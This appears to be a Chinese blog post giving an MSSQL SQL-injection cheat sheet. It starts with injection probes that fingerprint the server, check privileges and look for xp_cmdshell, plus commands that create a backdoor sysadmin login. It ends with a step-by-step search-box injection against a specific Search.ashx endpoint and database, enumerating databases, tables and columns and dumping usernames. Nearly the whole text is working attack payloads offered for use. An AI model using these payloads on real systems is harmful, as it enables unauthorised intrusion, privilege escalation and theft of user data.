简洁概述:
and exists (select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员
and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限
and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
;declare @d int //是否支持多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and 1=(select @@VERSION) and '%'='
搜索型SQL注入,需要注意闭合问题,所以普遍的格式为:
%' 开头 and 1=(select @@VERSION) 执行语句 and '%'=' 结尾语句
查数据库名:
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and 1=(select db_name()) and '%'=' //查当前数据库名
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (SELECT top 1 Name FROM Master..SysDatabases)>0 and '%'=' //查其他数据库名
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 and '%'=' //继续查下一个数据库名
查表名:
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (select top 1 name from Db_LeadingWinner.sys.all_objects where type='U' AND is_ms_shipped=0)>0 and '%'=' //查Db_LeadingWinner数据库表名
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (select top 1 name from Db_LeadingWinner.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FrontUser','UserPermission'))>0 and '%'=' //查下一个表名
查字段:
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (select top 1 COLUMN_NAME from Db_LeadingWinner.information_schema.columns where TABLE_NAME='RegisterUsers')>0 and '%'=' //查Db_LeadingWinner数据库RegisterUsers表的字段
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (select top 1 COLUMN_NAME from Db_LeadingWinner.information_schema.columns where TABLE_NAME='RegisterUsers' and COLUMN_NAME not in('ID','username'))>0 and '%'=' //查下一个字段
爆数据:
/profile/Search.ashx?Pageindex=1&KeyWord=2011%' and (select top 1 username from FrontUser) >0 and '%'=' //查FrontUser表的username字段内容
参考文章:
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !
